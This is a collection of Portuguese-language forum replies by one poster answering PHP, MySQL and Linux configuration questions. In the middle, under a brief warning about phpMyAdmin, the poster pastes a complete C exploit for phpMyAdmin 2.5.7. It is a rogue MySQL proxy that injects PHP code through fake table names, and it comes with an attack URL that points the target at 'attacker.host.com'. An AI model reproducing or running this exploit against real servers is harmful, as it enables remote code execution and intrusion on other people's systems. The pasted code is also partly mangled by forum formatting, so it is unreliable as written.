rog

isso eu acho que eu já tinha entendido amigo mas de que forma chega a nova messagem ?

montas uma pasta compartilhada como leitor no arranque do windoz

isso vai depender muito da arquitetura do seu prog

@joao.vanelli legal isso seria outra soluçao para apagar a messagem de erro mas a requeta continua aleatoria porque não tem seleçao do banco fora da funçao de qualquer forma eu detesto essas funçoes que deixam o banco connectado facilitam demais uma intrusao ao banco de dado

um exemple onde user e o campo na tabela que define user e logon define os usuarios logados o script retornara um array com os usuarios connectados <?php if(!mysql_connect("localhost","user","pass")) # connection {echo(mysql_error());} if(!mysql_select_db("rog_back")) # database selection {echo(mysql_error());} if(!($request=mysql_query("select user,logon from table where logon=1"))) {echo(mysql_error());} #echo(mysql_num_rows($request)); $i=0; $user=array(); while ($result=mysql_fetch_array($request)) { $user[$i]=$result['user']; $i++; } ?>

a tabua e atualizada tambem quando o jogador log off ? ps : não fica dando assim UID=;PWD=

podes conferir aqui um screen da opçao de segurança http://membres.lycos.fr/rogergirardin/index.php arquivo screen.jpeg

querer pingar o servidor não vai resolver de qualquer forma as informaçoes sobre connexao so podem vir do servidor de jogo ou do router se o seu amigo desenvolver o jogo ele deve ter condiçao de poder consultar o servidor com a linguagem proprietaria do jogo e escriver o relatorio num arquivo que seria accessivel pelo servidor do web site para poder fazer um parsing do arquivo para depois dar o output numa pagina php

a connexao da requeta ao banco e aleatoria @mysql_query("INSERT INTO mural (ip, browser, nome, para, email, data, mensagem) VALUES ('$ip','$browser','$nome','$para','$email','$data','$msg')") porque a funçao connect() não traz nemum id de recurso de connexao (que seria talvez $conexao) se trocar mysql_close($conexao); por mysql_close(); deve desaparecer a messagem mas a insert continua aleatorio, sujeito a desfoncionamente

e voce quer colocar essa informaçao onde no cliente ? numa pagina web ?

falando no phpmyadmin tem que ter cuidado source from k-otik -------------------------------------------------------- * phpmy-explt.c * written by Nasir Simbolon <nasir kecapi com> * eagle kecapi com * Jakarta, Indonesia * * June, 10 2004 * * A phpMyAdmin-2.5.7 exploite program. * This is a kind of mysql server wrapper acts like a proxy except that it will sends a fake table name, * when client query "SHOW TABLES", by replacing the real table name with a string contains exploite codes. * * Compile : gcc phpmy-explt.c -o phpmy-explt * * run with * ./phpmy-explt * * and go to your target and put * * http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg[servers][4][host]= * attacker.host.com&cfg[servers][4][port]=8889&cfg[servers][4][auth_type]=config&cfg[servers] * [4][user]=user&cfg[servers][4][password]=pass&cfg[servers][4][connect_type]=tcp&&cfg[servers] * [4][only_db]=databasename * * fill host,port,user,pass and databasename correctly * */ #include<stdio.h> #include<sys/socket.h> #include<netdb.h> #define BIND_PORT 8889 #define MYSQL_PORT 3306 #define HOSTNAME "localhost" #define DATABASE "phpmy" #define BUFFER_LEN 1024 /* This is php code we want to inject into phpMyAdmin Do NOT use single quote (') in the string, use double quote (") instead */ char *phpcodes = "exec(\"touch /tmp/your-phpmyadmin-is-vulnerable\");"; /* This is examples codes I captured when mysql server reply to client's request of query "SHOW TABLES" query. It shows database name 'phpmy' and contain one tablename 'mytable' Our aim is to manipulate the data received from mysql server by replacing 'mytable' with our exploide codes. 0x1 ,0x0 ,0x0 ,0x1 ,0x1 ,0x1b,0x0 ,0x0 ,0x2 ,0x0 , 0xf ,'T' ,'a' ,'b' ,'l' ,'e' ,'s' ,'_' ,'i' ,'n' , '_' ,'p' ,'h' ,'p' ,'m' ,'y' ,0x3 ,0x40,0x0 ,0x0 , 0x1 ,-2 ,0x3 ,0x1 ,0x0 ,0x1f,0x1 ,0x0 ,0x0 ,0x3 , -2 ,8 ,0x0 ,0x0 ,0x4 ,7 ,'m' ,'y' ,'t' ,'a' , 'b' ,'l' ,'e' ,0x1 ,0 ,0 ,0x5 ,-2 */ int build_exploite_code(char* dbname,char* phpcodes,char** expcode) { char my1[21] = {0x1 ,0x0 ,0x0 ,0x1 ,0x1 ,0x1b,0x0 ,0x0 ,0x2 ,0x0 , 0xf ,'T' ,'a' ,'b' ,'l' ,'e' ,'s' ,'_' ,'i' ,'n' , '_'}; /* part of dbname ('p' ,'h' ,'p' ,'m' ,'y') */ char my2[15] = {0x3 ,0x40,0x0 ,0x0 ,0x1 ,-2 ,0x3 ,0x1 ,0x0 ,0x1f, 0x1 ,0x0 ,0x0 ,0x3 ,-2}; /* part of int phpcodes string length +1 (8) */ char my3[3] = {0x0 ,0x0 ,0x4}; /* part of int phpcodes string length (7) */ /* part of tablename ('m' ,'y' ,'t' ,'a' ,'b' ,'l' ,'e' ) */ char my4[5] = {0x1 ,0 ,0 ,0x5 ,-2}; int len,i; len = 21 + strlen(dbname) + 15 + 1 + 3 + 1 + strlen(phpcodes) + 5 + 5; *expcode = (char*) malloc(sizeof(char) * len); i = 0; bcopy(&my1[0],*expcode + i,21); i += 21; bcopy(dbname, *expcode + i,strlen(dbname)); i += strlen(dbname); bcopy(&my2[0],*expcode + i,15); i += 15; (*expcode) = 5 + strlen(phpcodes) + 1; i ++; bcopy(&my3[0],*expcode + i,3); i += 3; (*expcode)[i++] = 5 + strlen(phpcodes) ; /* this is our exploite codes*/ (*expcode)[i++] = '\\'; (*expcode)[i++] = '\''; (*expcode)[i++] = ';'; bcopy(phpcodes,*expcode + i,strlen(phpcodes)); i += strlen(phpcodes); (*expcode)[i++] = '/'; (*expcode)[i++] = '*'; bcopy(&my4[0],*expcode + i,5); return len; } /* connect to mysql server*/ int connect_mysql() { int s2; struct sockaddr_in ina; struct hostent *h; h = gethostbyname(HOSTNAME); /* set internet address */ bcopy(h->h_addr,(void *)&ina.sin_addr,h->h_length); ina.sin_family = AF_INET; ina.sin_port = htons(MYSQL_PORT); //ina.sin_zero[0]='\0'; if((s2=socket(AF_INET,SOCK_STREAM,0)) < 0) perror("Socket: "); if(connect(s2,(struct sockaddr *)&ina,sizeof(ina)) < 0 ) perror("connect()"); return s2; } /* listener */ int listener() { int s1; int opt; struct sockaddr_in ina; /* set internet address */ ina.sin_family = AF_INET; ina.sin_port = htons(BIND_PORT); ina.sin_addr.s_addr = INADDR_ANY; if((s1=socket(AF_INET,SOCK_STREAM,0)) < 0) perror("Socket: "); opt = 1; setsockopt(s1,SOL_SOCKET, SO_REUSEADDR , (char *)&opt, sizeof(opt) ); if(bind(s1,(struct sockaddr *)&ina,sizeof(ina))==-1) perror("Bind: "); if(listen(s1, 10) == -1) perror("Listen"); return s1; } int main(int argc,char* argv[]) { struct sockaddr_in ina1; int ina1_l; int s_daemon,s_mysql; size_t byte_read,byte_written; char *buf; int sc,event,n_select; fd_set rfds; struct timeval tv; int exptlen,i; char *expt; char *dbname=DATABASE; buf = (char*) malloc(sizeof(char) * (BUFFER_LEN)); tv.tv_sec = 15; tv.tv_usec = 0; /* we listen to port */ s_daemon = listener(); exptlen = build_exploite_code(dbname,phpcodes,&expt); for(;cligne { fprintf(stderr,"waiting for connection\n"); if( -1 == (sc = accept(s_daemon,(struct sockaddr *) &ina1,&ina1_l)) ) perror("accept()"); /* if we get here, we have a new connection */ fprintf(stderr,"got client connection\n"); mysql: /* connect to mysql */ s_mysql = connect_mysql(); for(;cligne { FD_ZERO(&rfds); FD_SET(sc,&rfds); FD_SET(s_mysql,&rfds); n_select = (sc > s_mysql)? sc : s_mysql; event = select(n_select+1,&rfds,NULL,NULL,NULL); if(-1 == event) perror("select()"); else { if(FD_ISSET(s_mysql,&rfds)) { byte_read = read(s_mysql,buf,BUFFER_LEN); /* check for closing client connection*/ if(byte_read == 0) { shutdown(s_mysql,SHUT_RDWR); close(s_mysql); goto mysql; } /* check data received from mysql server. * if buf[11] contain 'T', data received from mysq server is table list * * NOW we replace the table with our exploite codes and send them to client */ if( 'T' == buf[11]) { for(i=0;i<exptlen;i++) buf = expt; byte_read = exptlen; } if(write(sc, buf, byte_read) < 0) break; } if(FD_ISSET(sc,&rfds)) { byte_read = read(sc,buf,BUFFER_LEN); /* check for closing client connection*/ if(byte_read == 0) { close(sc); break; } if(write(s_mysql,buf,byte_read) < 0) break; } #if defined(DEBUG) fprintf(stderr,"data:\n"); for(i=0;i<byte_read;i++) fprintf(stderr," %c(%x) ",buf,buf); #endif } } } free(buf); free(expt); return 0; }

mas eles connectam com um navegador ou com um cliente ?

se eu perguntei o que custava isso e que eu poderia ser um cliente potencial so null em design

na realidade você pode montar os recursos no lugar que você determinar mas editas /etc/fstab premeiro para ver se ele já não deu a instruçao de montagem

lol se o qtparted reconhece ele ==> já esta algo bom você tem que pegar o nome dos recurso (talvez hdbxx) assim que você pega os nomes, você faça um backup do /etc/fstab cp /etc/fstab /etc/fstab.bak depois você lança como root vi /etc/fstab e você posta aqui para nos te fazer a alteração

humm # já que parece que você quer fazer codigo limpo, tentas por nome de variavel que corespondam ao nome real holyonline.ath.cx e um dns, $dns seria mais apropriado $ip = "holyonline.ath.cx"; e o endereço do servidor onde esta o jogo online ?

poderia testar java script declara uma funçao que manda o formulario declaras outra funçao manda o segundo formulario declaras uma terceira que chama as duas no seu submit botao você declaras input type button onclick=terceira funçao mas não e 100 % certo que dê

e uma pequena possibilidade mesmo como e uma sub requesta se a pagina dele for <? $a=10; ?> tem que testar se virtual("path"); traze $a mas não e certo ---------------------------- mas se o arquivo for em txt (nem que seja chamado php) então seria muito mais simple lol

podes olhar as opçoes de segurança tambem e colocar elas ao nivel por default

tem uma pequena possibilidade <!--#include virtual="http://www.meuserv.com.br/config.asp" --> em php vai ser virtual ()

hola Error404 geralmente eu aprecio muito seus postos esse tb e interessante mas no exemple que você deu, se trata de $HTTP_POST_VARS que e uma variavel global mas no exemple citado por me e differente : $_POST e super global ==> já e global em todos os contextos de execuçao (funçao e class) so não precisa declarar em neuma circonstancia

sei que vao me xingar mas $cn = mysql_connect("localhost");//essa é a conexao padrão 1) localhost e o endereço do servidor (aqui e localhost porque o servidor mysql e installado na mesma maquina que o apache então ele e chamado pela loop interna) mas muitas vezes num providor pro você vai ver que o servidor mysql não esta na mesma maquina então tera que por mysql.domino 2) quando php vai tentar abrir um socket no servidor mysql, o servidor vai pedir o nome do usuario para conferir se ele esta na lista dos usuarios autorisados a connectar 3) ele tambem vai pedir a senha do usuario para verificar se pode liberar connexao para depois verificar quais são os privilegios daquele usuario então $cn = mysql_connect($server,$user,$senha); e como o port por default e 3306 mas nem todos servidor usam o port 3306 o mais certo seria $server=$server_name.":".$server_port; $cn = mysql_connect($server,$user,$senha);

$_GET['curso'] já e global em todos os contextos de execuçao (funçao e class)

poderia postar o conteudo do lilo.conf ?

se register_globals estiver off, $PHP_SELF não funciona não? ele vai se encontrar no array $_SERVER $_SERVER['PHP_SELF']